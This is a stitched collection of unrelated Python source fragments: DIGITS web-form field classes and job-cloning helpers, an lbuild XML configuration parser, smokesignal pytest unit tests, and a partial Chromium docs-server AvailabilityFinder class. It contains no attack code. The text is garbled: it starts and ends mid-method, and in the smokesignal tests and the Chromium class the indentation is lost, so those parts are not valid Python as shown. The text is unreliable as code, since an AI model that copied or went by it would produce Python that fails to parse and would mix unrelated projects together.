        if 'for_' in kwargs:
            kwargs['for'] = kwargs.pop('for_')
        else:
            kwargs.setdefault('for', self.field_id)
        # Imported lazily to avoid a circular import at module load time.
        import flask
        from digits.webapp import app
        html = ''
        # get the text from the html file; an application context is needed
        # because the template may reference Flask globals
        with app.app_context():
            html = flask.render_template(file if file else self.file)
        if len(html) == 0: return ''
        return wtforms.widgets.HTMLString(
            ('<div id="%s_explanation" style="display:none;">\n'
             '%s'
             '</div>\n'
             '<a href=# onClick="bootbox.alert($(\'#%s_explanation\').html()); return false;"><span class="glyphicon glyphicon-question-sign"></span></a>\n'
             ) % (self.for_name, html, self.for_name))
    def __repr__(self):
        return 'Explanation(%r, %r, %r)' % (self.field_id, self.for_name, self.file)
class IntegerField(wtforms.IntegerField):
    # wtforms.IntegerField extended with a Tooltip and an Explanation so the
    # templates can render contextual help next to the field.
    def __init__(self, label='', validators=None, tooltip='', explanation_file = '', **kwargs):
        super(IntegerField, self).__init__(label, validators, **kwargs)
        self.tooltip = Tooltip(self.id, self.short_name, tooltip)
        self.explanation = Explanation(self.id, self.short_name, explanation_file)
class FloatField(wtforms.FloatField):
    # wtforms.FloatField extended with a Tooltip and an Explanation.
    def __init__(self, label='', validators=None, tooltip='', explanation_file = '', **kwargs):
        super(FloatField, self).__init__(label, validators, **kwargs)
        self.tooltip = Tooltip(self.id, self.short_name, tooltip)
        self.explanation = Explanation(self.id, self.short_name, explanation_file)
class SelectField(wtforms.SelectField):
    # wtforms.SelectField extended with a Tooltip and an Explanation.
    def __init__(self, label='', validators=None, tooltip='', explanation_file = '', **kwargs):
        super(SelectField, self).__init__(label, validators, **kwargs)
        self.tooltip = Tooltip(self.id, self.short_name, tooltip)
        self.explanation = Explanation(self.id, self.short_name, explanation_file)
class SelectMultipleField(wtforms.SelectMultipleField):
    # wtforms.SelectMultipleField extended with a Tooltip and an Explanation.
    def __init__(self, label='', validators=None, tooltip='', explanation_file = '', **kwargs):
        super(SelectMultipleField, self).__init__(label, validators, **kwargs)
        self.tooltip = Tooltip(self.id, self.short_name, tooltip)
        self.explanation = Explanation(self.id, self.short_name, explanation_file)
class TextField(wtforms.TextField):
    # wtforms.TextField extended with a Tooltip and an Explanation.
    def __init__(self, label='', validators=None, tooltip='', explanation_file = '', **kwargs):
        super(TextField, self).__init__(label, validators, **kwargs)
        self.tooltip = Tooltip(self.id, self.short_name, tooltip)
        self.explanation = Explanation(self.id, self.short_name, explanation_file)
class StringField(wtforms.StringField):
    # wtforms.StringField extended with a Tooltip and an Explanation.
    def __init__(self, label='', validators=None, tooltip='', explanation_file = '', **kwargs):
        super(StringField, self).__init__(label, validators, **kwargs)
        self.tooltip = Tooltip(self.id, self.short_name, tooltip)
        self.explanation = Explanation(self.id, self.short_name, explanation_file)
class FileInput(object):
    """
    Renders a file input chooser field.

    Emits a Bootstrap input-group: a styled "Browse" button wrapping the
    real <input type="file">, plus a read-only text box that client-side
    script fills with the chosen file name.
    """
    def __call__(self, field, **kwargs):
        kwargs.setdefault('id', field.id)
        return wtforms.widgets.HTMLString(
            ('<div class="input-group">' +
             ' <span class="input-group-btn">' +
             ' <span class="btn btn-info btn-file" %s>' +
             ' Browse…' +
             ' <input %s>' +
             ' </span>' +
             ' </span>' +
             ' <input class="form-control" %s readonly>' +
             '</div>') % (wtforms.widgets.html_params(id=field.name + '_btn', name=field.name + '_btn'),
                          wtforms.widgets.html_params(name=field.name, type='file', **kwargs),
                          wtforms.widgets.html_params(id=field.id + '_text', name=field.name + '_text', type='text')))
class FileField(wtforms.FileField):
    # wtforms.FileField extended with a Tooltip and an Explanation, rendered
    # with the custom Bootstrap FileInput widget defined above.
    # Comment out the following line to use the native file input
    widget = FileInput()
    def __init__(self, label='', validators=None, tooltip='', explanation_file = '', **kwargs):
        super(FileField, self).__init__(label, validators, **kwargs)
        self.tooltip = Tooltip(self.id, self.short_name, tooltip)
        self.explanation = Explanation(self.id, self.short_name, explanation_file)
class TextAreaField(wtforms.TextAreaField):
    # wtforms.TextAreaField extended with a Tooltip and an Explanation.
    def __init__(self, label='', validators=None, tooltip='', explanation_file = '', **kwargs):
        super(TextAreaField, self).__init__(label, validators, **kwargs)
        self.tooltip = Tooltip(self.id, self.short_name, tooltip)
        self.explanation = Explanation(self.id, self.short_name, explanation_file)
class BooleanField(wtforms.BooleanField):
    # wtforms.BooleanField extended with a Tooltip and an Explanation.
    def __init__(self, label='', validators=None, tooltip='', explanation_file = '', **kwargs):
        super(BooleanField, self).__init__(label, validators, **kwargs)
        self.tooltip = Tooltip(self.id, self.short_name, tooltip)
        self.explanation = Explanation(self.id, self.short_name, explanation_file)
## Helpers used to save form field data to a job so forms can be repopulated when cloning
def add_warning(form, warning):
    """Append ``warning`` to the form's ``warnings`` tuple, creating the
    attribute on first use. Always returns True."""
    existing = getattr(form, 'warnings', tuple())
    form.warnings = existing + (warning,)
    return True
## Iterate over the form looking for field data to either save to or
## get from the job depending on function.
def iterate_over_form(job, form, function, prefix = ['form'], indent = ''):
    """Recursively walk ``form`` and apply ``function(job, field, key, value)``
    to every whitelisted field; returns True if any call reported a warning.

    NOTE(review): the mutable default ``prefix=['form']`` is shared across
    calls; it is never mutated here (only ``prefix + [...]`` copies are
    made), but the pattern is fragile.
    """
    warnings = False
    # Objects without __dict__ cannot hold fields to iterate.
    if not hasattr(form, '__dict__'): return False
    # This is the list of Field types to save. SubmitField and
    # FileField is excluded. SubmitField would cause it to post and
    # FileField can not be populated.
    whitelist_fields = [
        'BooleanField', 'FloatField', 'HiddenField', 'IntegerField',
        'RadioField', 'SelectField', 'SelectMultipleField',
        'StringField', 'TextAreaField', 'TextField']
    blacklist_fields = ['FileField', 'SubmitField']
    for attr_name in vars(form):
        if attr_name == 'csrf_token' or attr_name == 'flags':
            continue
        attr = getattr(form, attr_name)
        if isinstance(attr, object):
            if isinstance(attr, SubmitField): continue
            # Recurse into nested forms/fields, extending the dotted key path.
            warnings |= iterate_over_form(job, attr, function, prefix + [attr_name], indent + ' ')
        if hasattr(attr, 'data') and hasattr(attr, 'type'):
            if (isinstance(attr.data, int) or
                    isinstance(attr.data, float) or
                    isinstance(attr.data, basestring) or
                    attr.type in whitelist_fields):
                # Dotted key, e.g. 'form.subform.field.data'.
                key = '%s.%s.data' % ('.'.join(prefix), attr_name)
                warnings |= function(job, attr, key, attr.data)
            # Warn if certain field types are not cloned
            if (len(attr.type) > 5 and attr.type[-5:] == 'Field' and
                    attr.type not in whitelist_fields and
                    attr.type not in blacklist_fields):
                warnings |= add_warning(attr, 'Field type, %s, not cloned' % attr.type)
    return warnings
## function to pass to iterate_over_form to save data to job
def set_data(job, form, key, value):
    """Store ``value`` under ``key`` in ``job.form_data``, creating the dict
    on first use. Returns False (no warning generated)."""
    if not hasattr(job, 'form_data'): job.form_data = dict()
    job.form_data[key] = value
    # Removed dead code: a `basestring` quoting step that only fed a
    # commented-out debug print and raised NameError under Python 3.
    return False
## function to pass to iterate_over_form to get data from job
def get_data(job, form, key, value):
    """Populate ``form.data`` from ``job.form_data[key]``.

    Returns True (and adds a warning to the form) when the key is missing
    from the saved job data; returns False on success.
    """
    if key not in job.form_data:
        # Fixed message typo: 'data form source' -> 'data from source'.
        add_warning(form, 'Unable to recover data from source Job.')
        return True
    else:
        form.data = job.form_data[key]
        return False
## Save the field data in ``form`` to the job so the form can later be
## populated with the same settings during a clone event.
def save_form_to_job(job, form):
    iterate_over_form(job, form, set_data)
## Populate the form with form field data saved in the job
def fill_form_from_job(job, form):
    # NOTE(review): iterate_over_form returns a boolean, so this overwrites
    # any tuple of warnings set via add_warning with True/False — confirm
    # that downstream consumers of form.warnings expect a boolean here.
    form.warnings = iterate_over_form(job, form, get_data)
## This logic is used in several functions where ?clone=<job_id> may
## be added to the url. If ?clone=<job_id> is specified in the url,
## fill the form with that job's saved settings.
def fill_form_if_cloned(form):
    ## is there a request to clone a job?
    # Imported lazily to avoid a circular import at module load time.
    from digits.webapp import scheduler
    clone = get_request_arg('clone')
    if clone is not None:
        # NOTE(review): scheduler.get_job() may return None for an unknown
        # id, which would make fill_form_from_job fail — confirm callers
        # validate the id first.
        clone_job = scheduler.get_job(clone)
        fill_form_from_job(clone_job, form)
| |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright (c) 2015-2018, Fabian Greif
# All Rights Reserved.
#
# The file is part of the lbuild project and is released under the
# 2-clause BSD license. See the file `LICENSE.txt` for the full license
# governing this code.
import os
import pkgutil
import logging
import collections
import lxml.etree
from .exception import BlobException
import lbuild.module
# Module-wide logger and the default folder name for the repository cache.
LOGGER = logging.getLogger('lbuild.config')
DEFAULT_CACHE_FOLDER = ".lbuild_cache"
class Option:
    """
    Option in the configuration file.
    """

    def __init__(self, name, value):
        """
        Construct a new option.

        Args:
            name: Option name. Can be not fully qualified.
            value: Value of the option.
        """
        self.name = name
        self.value = value

    def __eq__(self, other):
        # Return NotImplemented for foreign types instead of raising
        # AttributeError, so comparisons against non-Options behave sanely.
        if not isinstance(other, Option):
            return NotImplemented
        return (self.name == other.name and self.value == other.value)

    def __lt__(self, other):
        # Options sort by name only.
        return self.name < other.name

    def __hash__(self):
        # Defining __eq__ would otherwise set __hash__ to None in Python 3;
        # keep Option usable in sets/dict keys.
        return hash((self.name, self.value))

    def __repr__(self):
        return "<Option: {}={}>".format(self.name, self.value)
class Configuration:
    """Parsed representation of an lbuild project configuration file."""

    def __init__(self):
        self.filename = ""
        # Path to the configuration file. Use to resolve relative paths.
        self.configpath = ""
        self.options = []            # list of Option objects
        self.selected_modules = []   # requested module names
        self.repositories = []       # absolute paths of repository files
        self.cachefolder = None      # folder used e.g. for VCS checkouts
        self.vcs = []                # version-control sections as dicts

    @staticmethod
    def load_and_verify(configfile):
        """
        Verify the XML structure.

        Parses ``configfile``, validates it against the bundled
        ``configuration.xsd`` schema and returns the XML root element.

        Raises:
            BlobException: if the file cannot be read or is invalid.
        """
        try:
            LOGGER.debug("Parse configuration '%s'", configfile)
            xmlroot = lxml.etree.parse(configfile)
            xmlschema = lxml.etree.fromstring(pkgutil.get_data('lbuild', 'resources/configuration.xsd'))
            schema = lxml.etree.XMLSchema(xmlschema)
            schema.assertValid(xmlroot)
            xmltree = xmlroot.getroot()
        except OSError as error:
            raise BlobException(error)
        except (lxml.etree.DocumentInvalid,
                lxml.etree.XMLSyntaxError,
                lxml.etree.XMLSchemaParseError,
                lxml.etree.XIncludeError) as error:
            raise BlobException("While parsing '{}':"
                                " {}".format(error.error_log.last_error.filename,
                                             error))
        return xmltree

    @staticmethod
    def parse_configuration(configfile, childconfig=None):
        """
        Parse the configuration file.

        This file contains information about which modules should be included
        and how they are configured.

        Args:
            configfile: path of the XML configuration file.
            childconfig: existing Configuration to merge into (used when
                recursing into <extends> base configurations).

        Returns:
            Populated Configuration object.
        """
        if childconfig is None:
            childconfig = Configuration()
        xmltree = Configuration.load_and_verify(configfile)
        configpath = os.path.dirname(configfile)
        # Merge any base configurations referenced via <extends> first, so
        # this file's own settings override the inherited ones below.
        for basenode in xmltree.iterfind("extends"):
            basefile = Configuration.__get_path(basenode.text, configpath)
            Configuration.parse_configuration(basefile, childconfig)
        configuration = childconfig
        configuration.filename = configfile
        configuration.configpath = configpath
        # Load cachefolder
        cache_node = xmltree.find("repositories/cache")
        if cache_node is not None:
            cachefolder = Configuration.__get_path(cache_node.text, configuration.configpath)
        else:
            # Keep an inherited cachefolder, otherwise fall back to default.
            default = DEFAULT_CACHE_FOLDER if configuration.cachefolder is None else configuration.cachefolder
            cachefolder = os.path.join(configuration.configpath, default)
        configuration.cachefolder = cachefolder
        # Load version control nodes
        for vcs_node in xmltree.iterfind("repositories/repository/vcs"):
            for vcs in vcs_node.iterchildren():
                vcs_config = Configuration.to_dict(vcs)
                configuration.vcs.append(vcs_config)
        # Load repositories (deduplicated by their resolved absolute path;
        # paths may reference the cache via '{cache}')
        for path_node in xmltree.iterfind("repositories/repository/path"):
            repository_path = path_node.text.format(cache=cachefolder)
            repository_filename = os.path.realpath(os.path.join(configuration.configpath,
                                                                repository_path))
            if repository_filename not in configuration.repositories:
                configuration.repositories.append(repository_filename)
        # Load all requested modules
        for modules_node in xmltree.findall('modules'):
            for module_node in modules_node.findall('module'):
                modulename = module_node.text
                lbuild.module.verify_module_name(modulename)
                LOGGER.debug("- require module '%s'", modulename)
                if modulename not in configuration.selected_modules:
                    configuration.selected_modules.append(modulename)
        # Load options; a value may be given either as an attribute or as
        # the element text.
        for option_node in xmltree.find('options').findall('option'):
            name = option_node.attrib['name']
            try:
                value = option_node.attrib['value']
            except KeyError:
                value = option_node.text
            # Later definitions (e.g. from the child configuration) replace
            # earlier ones with the same name.
            for index, option in enumerate(configuration.options):
                if option.name == name:
                    del configuration.options[index]
            configuration.options.append(Option(name=name, value=value))
        return configuration

    @staticmethod
    def __get_path(path, configpath):
        # Resolve a possibly relative path against the configuration folder.
        if os.path.isabs(path):
            return path
        else:
            return os.path.join(configpath, path)

    @staticmethod
    def format_commandline_options(cmd_options):
        """Convert 'name=value' strings from the command line into Options."""
        cmd = []
        for option in cmd_options:
            parts = option.split('=')
            cmd.append(Option(name=parts[0], value=parts[1]))
        return cmd

    @staticmethod
    def to_dict(xmltree):
        """
        Convert XML to a Python dictionary according to
        http://www.xml.com/pub/a/2006/05/31/converting-between-xml-and-json.html
        """
        d = {xmltree.tag: {} if xmltree.attrib else None}
        children = []
        for c in xmltree:
            children.append(c)
        if children:
            dd = collections.defaultdict(list)
            for dc in [Configuration.to_dict(c) for c in children]:
                for k, v in dc.items():
                    dd[k].append(v)
            # Collapse single-element lists to plain values.
            d = {xmltree.tag: {k:v[0] if len(v) == 1 else v for k, v in dd.items()}}
        if xmltree.attrib:
            # Attributes become '@'-prefixed keys.
            d[xmltree.tag].update(('@' + k, v) for k, v in xmltree.attrib.items())
        if xmltree.text:
            text = xmltree.text.strip()
            if children or xmltree.attrib:
                if text:
                    d[xmltree.tag]['#text'] = text
            else:
                d[xmltree.tag] = text
        return d
| |
""" Unit tests """
import types
from collections import defaultdict
import pytest
from mock import Mock, call, patch
import smokesignal
if smokesignal._twisted_support:
from tests_twisted import TestTwisted
class TestSmokesignal(object):
    """Unit tests for the smokesignal publish/subscribe API.

    ``setup`` patches ``smokesignal.receivers`` with a fresh defaultdict for
    every test so callback registrations cannot leak between tests;
    ``teardown`` stops all patches.
    """
    def setup(self):
        # Mock with a FunctionType spec so smokesignal treats it like a real
        # function and can attach bookkeeping attributes (e.g. _max_calls).
        self.fn = Mock(spec=types.FunctionType)
        patch.object(smokesignal, 'receivers', defaultdict(set)).start()
    def teardown(self):
        patch.stopall()
    def test_call_no_max_calls(self):
        for x in range(5):
            smokesignal._call(self.fn)
        assert self.fn.call_count == 5
    def test_call_with_max_calls(self):
        self.fn._max_calls = 1
        for x in range(5):
            smokesignal._call(self.fn)
        assert self.fn.call_count == 1
    def test_clear(self):
        smokesignal.on('foo', self.fn)
        assert smokesignal.receivers['foo'] == set([self.fn])
        smokesignal.clear('foo')
        assert smokesignal.receivers['foo'] == set()
    def test_clear_no_args_clears_all(self):
        smokesignal.on(('foo', 'bar', 'baz'), self.fn)
        assert smokesignal.receivers == {
            'foo': set([self.fn]),
            'bar': set([self.fn]),
            'baz': set([self.fn]),
        }
        smokesignal.clear()
        assert smokesignal.receivers == {
            'foo': set(),
            'bar': set(),
            'baz': set(),
        }
    def test_clear_many(self):
        smokesignal.on(('foo', 'bar', 'baz'), self.fn)
        smokesignal.clear('foo', 'bar')
        assert smokesignal.receivers == {
            'foo': set(),
            'bar': set(),
            'baz': set([self.fn]),
        }
    def test_clear_all(self):
        smokesignal.on(('foo', 'bar'), self.fn)
        assert smokesignal.receivers == {
            'foo': set([self.fn]),
            'bar': set([self.fn]),
        }
        smokesignal.clear_all()
        assert smokesignal.receivers == {
            'foo': set(),
            'bar': set(),
        }
    def test_emit_with_no_callbacks(self):
        try:
            smokesignal.emit('foo')
        except:
            pytest.fail('Emitting a signal with no callback should not have raised')
    def test_emit_with_callbacks(self):
        # Register first
        smokesignal.on('foo', self.fn)
        smokesignal.emit('foo')
        assert self.fn.called
    def test_emit_with_callback_args(self):
        # Register first
        smokesignal.on('foo', self.fn)
        smokesignal.emit('foo', 1, 2, 3, foo='bar')
        self.fn.assert_called_with(1, 2, 3, foo='bar')
    def test_on_must_have_callables(self):
        with pytest.raises(AssertionError):
            smokesignal.on('foo', 'bar')
    def test_on_registers(self):
        smokesignal.on('foo', self.fn)
        assert smokesignal.receivers['foo'] == set([self.fn])
    def test_on_registers_many(self):
        assert smokesignal.receivers == {}
        smokesignal.on(('foo', 'bar'), self.fn)
        assert smokesignal.receivers == {
            'foo': set([self.fn]),
            'bar': set([self.fn]),
        }
    def test_on_max_calls(self):
        # Register first
        smokesignal.on('foo', self.fn, max_calls=3)
        # Call a bunch of times
        for x in range(10):
            smokesignal.emit('foo')
        assert self.fn.call_count == 3
        # The callback is deregistered once its call budget is exhausted.
        assert smokesignal.receivers['foo'] == set()
    def test_on_decorator_registers(self):
        @smokesignal.on('foo')
        def my_callback():
            pass
        assert smokesignal.receivers['foo'] == set([my_callback])
    def test_on_decorator_registers_many(self):
        @smokesignal.on(('foo', 'bar'))
        def my_callback():
            pass
        assert smokesignal.receivers == {
            'foo': set([my_callback]),
            'bar': set([my_callback]),
        }
    def test_on_decorator_max_calls(self):
        # Register first - like a decorator
        smokesignal.on('foo', max_calls=3)(self.fn)
        # Call a bunch of times
        for x in range(10):
            smokesignal.emit('foo')
        assert self.fn.call_count == 3
    def test_on_decorator_max_calls_as_arg(self):
        # Register first - like a decorator
        smokesignal.on('foo', 3)(self.fn)
        # Call a bunch of times
        for x in range(10):
            smokesignal.emit('foo')
        assert self.fn.call_count == 3
    def test_disconnect(self):
        # Register first
        smokesignal.on(('foo', 'bar'), self.fn)
        assert smokesignal.responds_to(self.fn, 'foo')
        assert smokesignal.responds_to(self.fn, 'bar')
        smokesignal.disconnect(self.fn)
        assert not smokesignal.responds_to(self.fn, 'foo')
        assert not smokesignal.responds_to(self.fn, 'bar')
    def test_disconnect_from_removes_only_one(self):
        # Register first
        smokesignal.on(('foo', 'bar'), self.fn)
        assert smokesignal.responds_to(self.fn, 'foo')
        assert smokesignal.responds_to(self.fn, 'bar')
        # Remove it
        smokesignal.disconnect_from(self.fn, 'foo')
        assert not smokesignal.responds_to(self.fn, 'foo')
        assert smokesignal.responds_to(self.fn, 'bar')
    def test_disconnect_from_removes_all(self):
        # Register first
        smokesignal.on(('foo', 'bar'), self.fn)
        assert smokesignal.responds_to(self.fn, 'foo')
        assert smokesignal.responds_to(self.fn, 'bar')
        # Remove it
        smokesignal.disconnect_from(self.fn, ('foo', 'bar'))
        assert not smokesignal.responds_to(self.fn, 'foo')
        assert not smokesignal.responds_to(self.fn, 'bar')
    def test_signals(self):
        # Register first
        smokesignal.on(('foo', 'bar'), self.fn)
        assert 'foo' in smokesignal.signals(self.fn)
        assert 'bar' in smokesignal.signals(self.fn)
    def test_responds_to_true(self):
        # Register first
        smokesignal.on('foo', self.fn)
        assert smokesignal.responds_to(self.fn, 'foo') is True
    def test_responds_to_false(self):
        # Register first
        smokesignal.on('foo', self.fn)
        assert smokesignal.responds_to(self.fn, 'bar') is False
    def test_once_raises(self):
        with pytest.raises(AssertionError):
            smokesignal.once('foo', 'bar')
    def test_once(self):
        # Register and call twice
        smokesignal.once('foo', self.fn)
        smokesignal.emit('foo')
        smokesignal.emit('foo')
        assert self.fn.call_count == 1
        assert smokesignal.receivers['foo'] == set()
    def test_once_decorator(self):
        # Register and call twice
        smokesignal.once('foo')(self.fn)
        smokesignal.emit('foo')
        smokesignal.emit('foo')
        assert self.fn.call_count == 1
    @patch('smokesignal.emit')
    def test_emitting_arg_style(self, emit):
        with smokesignal.emitting('foo'):
            pass
        emit.assert_called_with('foo')
    @patch('smokesignal.emit')
    def test_emitting_kwarg_style(self, emit):
        with smokesignal.emitting(enter='foo', exit='bar'):
            pass
        emit.assert_has_calls([call('foo'), call('bar')])
    def test_on_creates_responds_to_fn(self):
        # Registering a callback should create partials to smokesignal
        # methods for later user
        smokesignal.on('foo', self.fn)
        assert hasattr(self.fn, 'responds_to')
        assert self.fn.responds_to('foo')
    def test_on_creates_signals_fn(self):
        # Registering a callback should create partials to smokesignal
        # methods for later user
        smokesignal.on(('foo', 'bar'), self.fn)
        assert hasattr(self.fn, 'signals')
        assert 'foo' in self.fn.signals()
        assert 'bar' in self.fn.signals()
    def test_on_creates_disconnect_fn(self):
        smokesignal.on(('foo', 'bar'), self.fn)
        assert hasattr(self.fn, 'disconnect')
        self.fn.disconnect()
        assert self.fn.signals() == tuple()
    def test_on_creates_disconnect_from_fn(self):
        smokesignal.on(('foo', 'bar'), self.fn)
        assert hasattr(self.fn, 'disconnect_from')
        self.fn.disconnect_from('foo')
        assert self.fn.signals() == ('bar',)
    def test_instance_method(self):
        class Foo(object):
            def __init__(self):
                # Preferred way
                smokesignal.on('foo', self.foo)
                # Old way
                @smokesignal.on('foo')
                def _bar():
                    self.bar()
                self.foo_count = 0
                self.bar_count = 0
            def foo(self):
                self.foo_count += 1
            def bar(self):
                self.bar_count += 1
        foo = Foo()
        smokesignal.emit('foo')
        smokesignal.emit('bar')
        assert foo.foo_count == 1
        assert foo.bar_count == 1
    def test_instance_method_passes_args_kwargs(self):
        class Foo(object):
            def __init__(self):
                smokesignal.on('foo', self.foo)
                self.foo_count = 0
            def foo(self, n, mult=1):
                self.foo_count += (n * mult)
        foo = Foo()
        smokesignal.emit('foo', 5, mult=6)
        assert foo.foo_count == 30
    def test_instance_method_max_calls(self):
        class Foo(object):
            def __init__(self):
                smokesignal.once('foo', self.foo)
                self.foo_count = 0
            def foo(self):
                self.foo_count += 1
        foo = Foo()
        for x in range(5):
            smokesignal.emit('foo')
        assert foo.foo_count == 1
| |
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from collections import Mapping
import posixpath
from api_schema_graph import APISchemaGraph
from branch_utility import BranchUtility
from extensions_paths import API, JSON_TEMPLATES
from third_party.json_schema_compiler.model import UnixName
_EXTENSION_API = 'extension_api.json'
# The version where api_features.json is first available.
_API_FEATURES_MIN_VERSION = 28
# The version where permission_ and manifest_features.json are available and
# presented in the current format.
_ORIGINAL_FEATURES_MIN_VERSION = 20
# API schemas are aggregated in extension_api.json up to this version.
_EXTENSION_API_MAX_VERSION = 17
# The earliest version for which we have SVN data.
_SVN_MIN_VERSION = 5
def _GetChannelFromFeatures(api_name, json_fs, filename):
  '''Finds API channel information for |api_name| from the features file
  |filename| within the given |json_fs|. Returns None if channel information
  for the API cannot be located.
  '''
  features = json_fs.GetFromFile(API + filename).Get()
  feature = features.get(api_name)
  if feature is None:
    return None
  # The channel information either exists as a solitary dict, or is nested
  # within a list for whitelisting purposes. In the latter case take the
  # newest channel out of all of the entries.
  if isinstance(feature, Mapping):
    return feature.get('channel')
  channels = (entry.get('channel') for entry in feature)
  return BranchUtility.NewestChannel(channels)
def _GetChannelFromApiFeatures(api_name, json_fs):
  # Channel lookup in _api_features.json (present from version 28 onwards,
  # see _API_FEATURES_MIN_VERSION).
  return _GetChannelFromFeatures(api_name, json_fs, '_api_features.json')
def _GetChannelFromManifestFeatures(api_name, json_fs):
  # Channel lookup in _manifest_features.json.
  # _manifest_features.json uses unix_style API names.
  api_name = UnixName(api_name)
  return _GetChannelFromFeatures(api_name, json_fs, '_manifest_features.json')
def _GetChannelFromPermissionFeatures(api_name, json_fs):
  # Channel lookup in _permission_features.json.
  return _GetChannelFromFeatures(api_name, json_fs, '_permission_features.json')
class AvailabilityFinder(object):
'''Generates availability information for APIs by looking at API schemas and
_features files over multiple release versions of Chrome.
'''
def __init__(self,
branch_utility,
compiled_fs_factory,
file_system_iterator,
host_file_system,
object_store_creator):
self._branch_utility = branch_utility
self._compiled_fs_factory = compiled_fs_factory
self._file_system_iterator = file_system_iterator
self._host_file_system = host_file_system
self._object_store_creator = object_store_creator
def create_object_store(category):
return object_store_creator.Create(AvailabilityFinder, category=category)
self._top_level_object_store = create_object_store('top_level')
self._node_level_object_store = create_object_store('node_level')
self._json_fs = compiled_fs_factory.ForJson(self._host_file_system)
def _GetPredeterminedAvailability(self, api_name):
'''Checks a configuration file for hardcoded (i.e. predetermined)
availability information for an API.
'''
api_info = self._json_fs.GetFromFile(
JSON_TEMPLATES + 'api_availabilities.json').Get().get(api_name)
if api_info is None:
return None
if api_info['channel'] == 'stable':
return self._branch_utility.GetStableChannelInfo(api_info['version'])
else:
return self._branch_utility.GetChannelInfo(api_info['channel'])
def _GetApiSchemaFilename(self, api_name, file_system, version):
'''Gets the name of the file which may contain the schema for |api_name| in
|file_system|, or None if the API is not found. Note that this may be the
single _EXTENSION_API file which all APIs share in older versions of Chrome,
in which case it is unknown whether the API actually exists there.
'''
def under_api_path(path):
return API + path
if version == 'trunk' or version > _ORIGINAL_FEATURES_MIN_VERSION:
# API schema filenames switch format to unix_hacker_style.
api_name = UnixName(api_name)
# |file_system| will cache the results from the ReadSingle() call.
filenames = file_system.ReadSingle(API).Get()
for ext in ('json', 'idl'):
filename = '%s.%s' % (api_name, ext)
if filename in filenames:
return under_api_path(filename)
if _EXTENSION_API in filenames:
return under_api_path(_EXTENSION_API)
# API schema data could not be found in any .json or .idl file.
return None
def _GetApiSchema(self, api_name, file_system, version):
'''Searches |file_system| for |api_name|'s API schema data, and processes
and returns it if found.
'''
api_filename = self._GetApiSchemaFilename(api_name, file_system, version)
if api_filename is None:
# No file for the API could be found in the given |file_system|.
return None
schema_fs = self._compiled_fs_factory.ForApiSchema(file_system)
api_schemas = schema_fs.GetFromFile(api_filename).Get()
matching_schemas = [api for api in api_schemas
if api['namespace'] == api_name]
# There should only be a single matching schema per file, or zero in the
# case of no API data being found in _EXTENSION_API.
assert len(matching_schemas) <= 1
return matching_schemas or None
def _HasApiSchema(self, api_name, file_system, version):
'''Whether or not an API schema for |api_name|exists in the given
|file_system|.
'''
filename = self._GetApiSchemaFilename(api_name, file_system, version)
if filename is None:
return False
if filename.endswith(_EXTENSION_API):
return self._GetApiSchema(api_name, file_system, version) is not None
return True
def _CheckStableAvailability(self, api_name, file_system, version):
'''Checks for availability of an API, |api_name|, on the stable channel.
Considers several _features.json files, file system existence, and
extension_api.json depending on the given |version|.
'''
if version < _SVN_MIN_VERSION:
# SVN data isn't available below this version.
return False
available_channel = None
json_fs = self._compiled_fs_factory.ForJson(file_system)
if version >= _API_FEATURES_MIN_VERSION:
# The _api_features.json file first appears in version 28 and should be
# the most reliable for finding API availability.
available_channel = _GetChannelFromApiFeatures(api_name, json_fs)
if version >= _ORIGINAL_FEATURES_MIN_VERSION:
# The _permission_features.json and _manifest_features.json files are
# present in Chrome 20 and onwards. Use these if no information could be
# found using _api_features.json.
available_channel = available_channel or (
_GetChannelFromPermissionFeatures(api_name, json_fs)
or _GetChannelFromManifestFeatures(api_name, json_fs))
if available_channel is not None:
return available_channel == 'stable'
if version >= _SVN_MIN_VERSION:
# Fall back to a check for file system existence if the API is not
# stable in any of the _features.json files, or if the _features files
# do not exist (version 19 and earlier).
return self._HasApiSchema(api_name, file_system, version)
def _CheckChannelAvailability(self, api_name, file_system, channel_info):
'''Searches through the _features files in a given |file_system|, falling
back to checking the file system for API schema existence, to determine
whether or not an API is available on the given channel, |channel_info|.
'''
json_fs = self._compiled_fs_factory.ForJson(file_system)
available_channel = (_GetChannelFromApiFeatures(api_name, json_fs)
or _GetChannelFromPermissionFeatures(api_name, json_fs)
or _GetChannelFromManifestFeatures(api_name, json_fs))
if (available_channel is None and
self._HasApiSchema(api_name, file_system, channel_info.version)):
# If an API is not represented in any of the _features files, but exists
# in the filesystem, then assume it is available in this version.
# The chrome.windows API is an example of this.
available_channel = channel_info.channel
# If the channel we're checking is the same as or newer than the
# |available_channel| then the API is available at this channel.
newest = BranchUtility.NewestChannel((available_channel,
channel_info.channel))
return available_channel is not None and newest == channel_info.channel
def _CheckApiAvailability(self, api_name, file_system, channel_info):
'''Determines the availability for an API at a certain version of Chrome.
Two branches of logic are used depending on whether or not the API is
determined to be 'stable' at the given version.
'''
if channel_info.channel == 'stable':
return self._CheckStableAvailability(api_name,
file_system,
channel_info.version)
return self._CheckChannelAvailability(api_name,
file_system,
channel_info)
def GetApiAvailability(self, api_name):
  '''Returns the top-level availability of |api_name|.

  The result is cached in |self._top_level_object_store|.  On a cache miss
  the predetermined-availability table is consulted first; failing that, a
  descending walk over the hosted file systems (starting at 'dev') finds
  the oldest channel at which the API exists.  An API found nowhere on the
  walk is considered 'trunk'-only.
  '''
  cached = self._top_level_object_store.Get(api_name).Get()
  if cached is not None:
    return cached

  # Check for predetermined availability and cache this information if found.
  predetermined = self._GetPredeterminedAvailability(api_name)
  if predetermined is not None:
    self._top_level_object_store.Set(api_name, predetermined)
    return predetermined

  def check_api_availability(file_system, channel_info):
    return self._CheckApiAvailability(api_name, file_system, channel_info)

  found = self._file_system_iterator.Descending(
      self._branch_utility.GetChannelInfo('dev'),
      check_api_availability)
  if found is None:
    # Not available on 'dev', so it must be a 'trunk'-only API.
    found = self._branch_utility.GetChannelInfo('trunk')

  self._top_level_object_store.Set(api_name, found)
  return found
def GetApiNodeAvailability(self, api_name):
  '''Returns an APISchemaGraph annotated with each node's availability (the
  ChannelInfo at the oldest channel it's available in).

  Results are cached in |self._node_level_object_store|.
  '''
  availability_graph = self._node_level_object_store.Get(api_name).Get()
  if availability_graph is not None:
    return availability_graph

  def assert_not_none(value):
    # Fail loudly here rather than letting a None propagate into the graph
    # arithmetic below.
    assert value is not None
    return value

  availability_graph = APISchemaGraph()
  host_fs = self._host_file_system
